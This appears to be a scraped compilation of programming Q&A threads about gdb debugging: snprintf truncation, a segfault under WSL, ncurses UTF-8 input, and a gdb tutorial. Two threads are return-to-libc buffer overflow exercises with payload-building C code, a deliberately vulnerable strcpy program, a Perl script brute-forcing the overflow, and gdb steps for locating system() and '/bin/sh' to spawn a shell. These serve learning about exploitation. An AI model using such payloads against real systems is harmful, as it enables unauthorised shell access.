snprintf() overflows specified length - c

I was writing my own ncurses library and suddenly I found in GDB that snprintf() returned length larger than I specified. Is this defined behaviour or some mistake of mine ? The (reproducible) snippet code is this:
niko: snippets $ cat snprintf.c
#include <unistd.h>
#include <stdio.h>
char *example_string="This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout";
void snprintf_test(void) {
char tmp[72];
char fmt[32];
int len;
unsigned short x=20,y=30;
snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
write(STDOUT_FILENO,tmp,len);
}
int main(void) {
snprintf_test();
}
niko: snippets $
Now we compile with debugging info and run:
niko: snippets $ gcc -g -o snprintf snprintf.c
niko: snippets $ gdb ./snprintf -ex "break snprintf_test" -ex run
.....
Reading symbols from ./snprintf...done.
Breakpoint 1 at 0x40058e: file snprintf.c, line 10.
Starting program: /home/deptrack/depserv/snippets/snprintf
Breakpoint 1, snprintf_test () at snprintf.c:10
10 unsigned short x=20,y=30;
Missing separate debuginfos, use: dnf debuginfo-install glibc-2.22-16.fc23.x86_64
(gdb) s
12 snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
(gdb) print sizeof(fmt)
$1 = 32
(gdb) print sizeof(tmp)
$2 = 72
(gdb) s
13 len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
(gdb) print fmt
$3 = "\033[%d;%dH\033[0m\033[48;5;%dm%48s\000\000\000\000\000"
(gdb) print example_string
$4 = 0x4006c0 "This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout"
(gdb) s
14 write(STDOUT_FILENO,tmp,len);
(gdb) print len
$5 = 124
(gdb) print sizeof(tmp)
$6 = 72
(gdb)
The program outputs garbage at the end of the string. As you can see, the len variable returned from snprintf() is indicating that function has printed more than the allowed size of 72. Is this a bug or my mistake? If this behaviour is defined, then why snprintf() docs say it will print at most n characters. Very misleading and bug prone statement. I will have to write my own snprintf() to solve this problem.

Actually (from "man snprintf"):
If the output was
truncated due to this limit then the return value is the number of
characters (excluding the terminating null byte) which would have been
written to the final string if enough space had been available.

Related

Segmentation fault disappear with gdb in ubunutu on windows

I've been tasked with locating the bug in the following code, and fixing it:
/* $Id: count-words.c 858 2010-02-21 10:26:22Z tolpin $ */
#include <stdio.h>
#include <string.h>
/* return string "word" if the count is 1 or "words" otherwise */
char *words(int count) {
char *words = "words";
if(count==1)
words[strlen(words)-1] = '\0';
return words;
}
/* print a message reportint the number of words */
int print_word_count(char **argv) {
int count = 0;
char **a = argv;
while(*(a++))
++count;
printf("The sentence contains %d %s.\n", count, words(count));
return count;
}
/* print the number of words in the command line and return the number as the exit code */
int main(int argc, char **argv) {
return print_word_count(argv+1);
}
The program works well for every number of words given to it, except for one word. Running it with ./count-words hey will cause a segmentation fault.
I'm running my code on the Linux subsystem on Windows 10 (that's what I understand it is called at least...), with the official Ubuntu app.
When running the program from terminal, I do get the segmentation fault, but using gdb, for some reason the program works fine:
(gdb) r hey
Starting program: .../Task 0/count-words hey
The sentence contains 1 word.
[Inferior 1 (process 87) exited with code 01]
(gdb)
After adding a breakpoint on line 9 and stepping through the code, I get this:
(gdb) b 9
Breakpoint 1 at 0x400579: file count-words.c, line 9.
(gdb) r hey
Starting program: /mnt/c/Users/tfrei/Google Drive/BGU/Semester F/Computer Architecture/Labs/Lab 2/Task 0/count-words hey
Breakpoint 1, words (count=1) at count-words.c:9
9 if(count==1)
(gdb) s
10 words[strlen(words)-1] = '\0';
(gdb) s
strlen () at ../sysdeps/x86_64/strlen.S:66
66 ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) s
67 in ../sysdeps/x86_64/strlen.S
(gdb) s
68 in ../sysdeps/x86_64/strlen.S
(gdb)
The weird thing is that when I ran the same thing from a "true" Ubuntu (using a virtual machine on Windows 10), the segmentation fault did happen on gdb.
I tend to believe that the reason for this is somehow related to my runtime environment (the "Ubuntu on Windows" thing), but could not find anything that will help me.
This is my makefile:
all:
gcc -g -Wall -o count-words count-words.c
clean:
rm -f count-words
Thanks in advance
I'm asking why it didn't happen with gdb
It did happen with GDB, when run on a real (or virtual) UNIX system.
It didn't happen when running under the weird "Ubuntu on Windows" environment, because that environment is doing crazy sh*t. In particular, for some reason the Windows subsystem maps usually readonly sections (.rodata, and probably .text as well) with writable permissions (which is why the program no longer crashes), but only when you run the program under debugger.
I don't know why exactly Windows does that.
Note that debuggers do need to write to (readonly) .text section in order to insert breakpoints. On a real UNIX system, this is achieved by ptrace(PTRACE_POKETEXT, ...) system call, which updates the readonly page, but leaves it readonly for the inferior (being debugged) process.
I am guessing that Windows is imperfectly emulating this behavior (in particular does not write-protect the page after updating it).
P.S. In general, using "Ubuntu on Windows" to learn Ubuntu is going to be full of gotchas like this one. You will likely be much better off using a virtual machine instead.
This function is wrong
char *words(int count) {
char *words = "words";
if(count==1)
words[strlen(words)-1] = '\0';
return words;
}
The pointer words points to the string literal "words". Modifying a string
literal is undefined behaviour and in most system string literals are stored in
read-only memory, so doing
words[strlen(words)-1] = '\0';
will lead into a segfault. That's the behaviour you see in Ubuntu. I don't know
where strings literals are stored in windows executables, but modifying a string
literal is undefined behaviour and anything can happen and it's pointless to try
to deduce why sometimes things work and why sometimes things don't work. That's
the nature of undefined behaviour.
edit
Pablo thanks, but I'm not asking about the bug itself , and why the segmentation fault happened. I'm asking why it didn't happen with gdb. Sorry if that was not clear enough.
I don't know why it doesn't happent to your, but when I run your code on my gdb I get:
Reading symbols from ./bug...done.
(gdb) b 8
Breakpoint 1 at 0x6fc: file bug.c, line 8.
(gdb) r hey
Starting program: /tmp/bug hey
Breakpoint 1, words (count=1) at bug.c:8
8 words[strlen(words)-1] = '\0';
(gdb) s
Program received signal SIGSEGV, Segmentation fault.
0x0000555555554713 in words (count=1) at bug.c:8
8 words[strlen(words)-1] = '\0';
(gdb)

reading ncurses stdin in UTF-8

In my Linux program being developed in C with ncurses I need to read the stdin in UTF-8 encoding. However, whenever I do :
wint_t unicode_char=0;
get_wch(&unicode_char);
I get the wide character in utf-16 encoding (I can see it when I dump the variable with gdb). I do not want to convert it from utf-16 to utf-8, I want to force the input to be in UTF-8 all the time, no matter which Linux distribution runs my program with whatever foreign language the user has it configured. How is this done? Is it possible?
EDIT:
Here is the example source and proof that internally get_wch uses UTF-16 (which is the same as UTF-32) and not UTF-8, despite that I configured UTF-8 input source with setlocale().
[niko#dev1 ncurses]$ gcc -g -o getch -std=c99 $(ncursesw5-config --cflags --libs) getch.c
[niko#dev1 ncurses]$ cat getch.c
#define _GNU_SOURCE
#include <locale.h>
#include <ncursesw/ncurses.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int ct;
wint_t unichar;
int main(int argc, char *argv[])
{
setlocale(LC_ALL, ""); /* make sure UTF8 */
initscr();
raw();
keypad(stdscr, TRUE);
ct = get_wch(&unichar); /* read character */
mvprintw(24, 0, "Key pressed is = %4x ", unichar);
refresh();
getch();
endwin();
return 0;
}
Testing code with GDB:
🔎
Breakpoint 1, main (argc=1, argv=0x7fffffffded8) at getch.c:18
18 mvprintw(24, 0, "Key pressed is = %4x ", unichar);
Missing separate debuginfos, use: dnf debuginfo-install ncurses-libs-5.9-21.20150214.fc23.x86_64
(gdb) print unichar
$1 = 128270
(gdb) print/x ((unsigned short*) (&unichar))[0]
$2 = 0xf50e
(gdb) print/x ((unsigned short*) (&unichar))[1]
$3 = 0x1
(gdb) print/x ((unsigned char*) (&unichar))[0]
$4 = 0xe
(gdb) print/x ((unsigned char*) (&unichar))[1]
$5 = 0xf5
(gdb) print/x ((unsigned char*) (&unichar))[2]
$6 = 0x1
(gdb) print/x ((unsigned char*) (&unichar))[3]
$7 = 0x0
(gdb)
The input character is 🔎, and its UTF-8 should be 'f09f948e' as stated here: http://www.fileformat.info/info/unicode/char/1f50e/index.htm
How do I get UTF8 directly from get_wch() ?? Or maybe there is another function ?
P.S.
if you test the source code, link against '-lncursesw' , not '-lncurses' or compile with the same command as I did above
Short: you don't get UTF-8 from get_wch. That returns a wint_t (and a status code).
Long: you would get UTF-8 from ncurses getch because it converts to/from wchar_t internally:
Your program would have to read the encoded character one byte at a time, because getch only returns bytes (possibly combined with video attributes).
ncurses stores wchar_t values in the cells of each window structure.
addch and friends attempt to collect bytes for multibyte encodings (it's not specific to UTF-8, but not much used aside from this).
The attempt fails if you move the cursor in the middle of a string.
For what it's worth, dialog reads UTF-8 using getch. See inputstr.c to see how it works in practice.
X/Open curses as such does not do this (for the rare individual actually using Unix curses with UTF-8, there's no specified way).

return to lib_c buffer overflow exercise issue

I'm supposed to come up with a program that exploits the "return to libc buffer overflow". This is, when executed, it cleanly exits and brings up a SHELL prompt. The program is executed in a bash terminal. Below is my C code:
#include <stdio.h>
int main(int argc, char*argv[]){
char buffer[7];
char buf[42];
int i = 0;
while(i < 28)
{
buf[i] = 'a';
i = i + 1;
}
*(int *)&buf[28] = 0x4c4ab0;
*(int *)&buf[32] = 0x4ba520;
*(int *)&buf[36] = 0xbfffff13;
strcpy(buffer, buf);
return 0;
}
Using gdb, I've been able to determine the following:
Address for "system": 0x4c4ab0
Address for "exit": 0x4ba520
The string "/bin/sh" resides in memory at: 0xbfffff13
I also know, using gdb, that inserting 32 "A"'s into my buffer variable will overwrite the return address. So given that the system call is 4 bytes, I start by filling in my memory "leak" at 28 bytes. At the 28th byte, I begin my system call, then exit call, and finally add my "/bin/sh" memory location.
When I run the program, however, I get the following:
sh: B���: command not found
Segmentation fault (core dumped)
I'm really not sure what I'm doing wrong...
[EDIT]: I was able to get the string "/bin/sh" by exporting a environmental variable:
export MYSHELL="/bin/sh"
You can search in libc for a fixed address of a /bin/sh string. Run you program in gdb then:
> (gdb) break main
>
> (gdb) run
>
> (gdb) print &system
> $1 = (<text variable, no debug info>*) 0xf7e68250 <system>
>
> (gdb) find &system,+9999999,"/bin/sh"
> 0xf7f86c4c
> warning: Unable to access target memory at 0xf7fd0fd4, halting search.
> 1 pattern found.
Good luck.
The problem in your program is the pointer you suppose to point to the /bin/sh string is actually not pointing to /bin/sh.
You get this address using gdb. But even without stack randomization, the stack address of your shell variable is different when the program is run under gdb than without gdb. gdb is putting some debug information into the stack and this will shift your shell variables.
To convince yourself here is a quick and dirty program to find a /bin/sh string in the stack:
#include <stdio.h>
#include <string.h>
int main(void)
{
char s[] = "/bin/sh";
char *p = (char *) 0xbffff000;
while (memcmp(++p, s, sizeof s));
printf("%s\n", p);
printf("%p\n", p);
}
First double check that stack randomization is disabled:
ouah#maou:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 0
ouah#maou:~$
Ok, no stack randomization.
Let's compile the program and run it outside gdb:
ouah#maou:~$ gcc -std=c99 tst.c
ouah#maou:~$ ./a.out
/bin/sh
0xbffff724
ouah#maou:~$
Now let's run it under gdb:
ouah#maou:~$ ./a.out
/bin/sh
0xbffff724
ouah#maou:~$ gdb a.out -q
Reading symbols from /home/ouah/a.out...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/ouah/a.out
/bin/sh
0xbffff6e4
Program exited normally.
(gdb) quit
ouah#maou:~$
As you can see the address of the /bin/sh string is different when the program is run inside or outside gdb.
Now what you can do is to use a variant of this program to find the true address of your string or a more elegant approach, get the address of a /bin/sh string directly from the libc (as you can guess there are a few occurrences).

Return into libc - Illegal instruction

I am messing around with buffer overflows, particularly the return into libc kind.
I have the following vulnerable code:
#include<stdio.h>
#include<string.h>
main( int argc, char **argv)
{
char buffer[80];
getchar();
strcpy(buffer, argv[1]);
return 1;
}
I compiled it using gcc-2.95 (no -fstack-protector) with the -mpreferred-stack-boundary=2 flag. I followed the return into libc chapter of "Hacking: The Art of Exploitation".
First, I disabled ASLR:
$ cat /proc/sys/kernel/randomize_va_space
0
I found out the address of system:
$ cat find_system.c
int main() {
system("");
return 0;
}
$ gdb -q find_system
Reading symbols from /home/bob/return_to_libc/find_system...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x8048416
(gdb) run
Starting program: /home/bob/return_to_libc/find_system
Breakpoint 1, 0x08048416 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7eb6680 <system>
I created an environment variable to contain the command I want to execute using system:
$ cat get_env.c
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
printf("%s=%s: %p\n", argv[1], getenv(argv[1]), getenv(argv[1]));
return 0;
}
$ export EXPLOIT=/bin/zsh
$ ./get_env EXPLOIT
EXPLOIT=/bin/zsh: 0xbffff96d
And then I made a perl script to automate getting the shell:
$ cat script.pl
#!/usr/bin/perl
for ($i = 1; $i < 200; $i++) {
print "Perl count: $i\n";
system("echo 1 | ./vuln '" . "A"x$i . "\x80\x66\xeb\xb7FAKE\x6d\xf9\xff\xbf'");
}
$ ./script.pl
(...)
Perl count: 69
Perl count: 70
Perl count: 71
Perl count: 72
Illegal instruction
Perl count: 73
Segmentation fault
Perl count: 74
Segmentation fault
(...)
Where did I go wrong? Why do I get "illegal instruction" instead of my shell?
$ gdb vuln
(gdb) run 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\x66\xeb\xb7FAKE\x6d\xf9\xff\xbf'
Vary the number of 'A's to test the various failures. In find python -c "print 'A'*73" (73 used to produce the above) to be helpful for generating the arguments.
gdb will tell you exactly where you're crashing and what's at EIP/RIP when you crash. This should guide you to an answer to your question.
Most likely, you're not getting a good pointer in the return address on the stack and execution is landing in memory that doesn't disassemble to valid instructions. I'd think you're close here. The segmentaion faults are more likely to be execution landing in a region of memory that isn't even allocated.
Use (gdb) x/10i $eip to identify what instructions are at EIP when you crash. You can vary the length of the disassembly shown by altering the 10 in that command.
You'll also need to figure out where your argument to system is landing on the stack so that it makes it into the appropriate place in the calling convention to get system to call it. gdb should be able to help you here too (again, use x - x/4w maybe - and i r).
Successful exploitation requires both of the above pieces: the 0xb7eb6680 must be in the return address and the 0xbffff96d must be wherever system is going to read it's first argument from.
Another helpful trick: set a breakpoint on the ret at the end of the strcpy function. This is a handy place to inspect your stack and register state and identify what you're about to do. The ret is where exploitation happens: the return address you supply is read, the processor begins executing at that address and you're off, assuming you can sustain execution with proper arguments to whatever you're calling, etc. The program's state at this ret is the make or break point so it's the easiest place to see what's wrong with your input and why you will or will not successfully exploit the vulnerability.
Forgive me if my gdb syntax isn't bang on... it's not my primary debugger.

How to debug using gdb?

I am trying to add a breakpoint in my program using
b {line number}
but I am always getting an error that says:
No symbol table is loaded. Use the "file" command.
What should I do?
Here is a quick start tutorial for gdb:
/* test.c */
/* Sample program to debug. */
#include <stdio.h>
#include <stdlib.h>
int
main (int argc, char **argv)
{
if (argc != 3)
return 1;
int a = atoi (argv[1]);
int b = atoi (argv[2]);
int c = a + b;
printf ("%d\n", c);
return 0;
}
Compile with the -g3 option. g3 includes extra information, such as all the macro definitions present in the program.
gcc -g3 -o test test.c
Load the executable, which now contain the debugging symbols, into gdb:
gdb --annotate=3 test.exe
Now you should find yourself at the gdb prompt. There you can issue commands to gdb.
Say you like to place a breakpoint at line 11 and step through the execution, printing the values of the local variables - the following commands sequences will help you do this:
(gdb) break test.c:11
Breakpoint 1 at 0x401329: file test.c, line 11.
(gdb) set args 10 20
(gdb) run
Starting program: c:\Documents and Settings\VMathew\Desktop/test.exe 10 20
[New thread 3824.0x8e8]
Breakpoint 1, main (argc=3, argv=0x3d5a90) at test.c:11
(gdb) n
(gdb) print a
$1 = 10
(gdb) n
(gdb) print b
$2 = 20
(gdb) n
(gdb) print c
$3 = 30
(gdb) c
Continuing.
30
Program exited normally.
(gdb)
In short, the following commands are all you need to get started using gdb:
break file:lineno - sets a breakpoint in the file at lineno.
set args - sets the command line arguments.
run - executes the debugged program with the given command line arguments.
next (n) and step (s) - step program and step program until it
reaches a different source line, respectively.
print - prints a local variable
bt - print backtrace of all stack frames
c - continue execution.
Type help at the (gdb) prompt to get a list and description of all valid commands.
Start gdb with the executable as a parameter, so that it knows which program you want to debug:
gdb ./myprogram
Then you should be able to set breakpoints. For example:
b myfile.cpp:25
b some_function
Make sure you used the -g option when compiling.
You need to tell gdb the name of your executable file, either when you run gdb or using the file command:
$ gdb a.out
or
(gdb) file a.out
You need to use -g or -ggdb option at compile time of your program.
E.g., gcc -ggdb file_name.c ; gdb ./a.out

Resources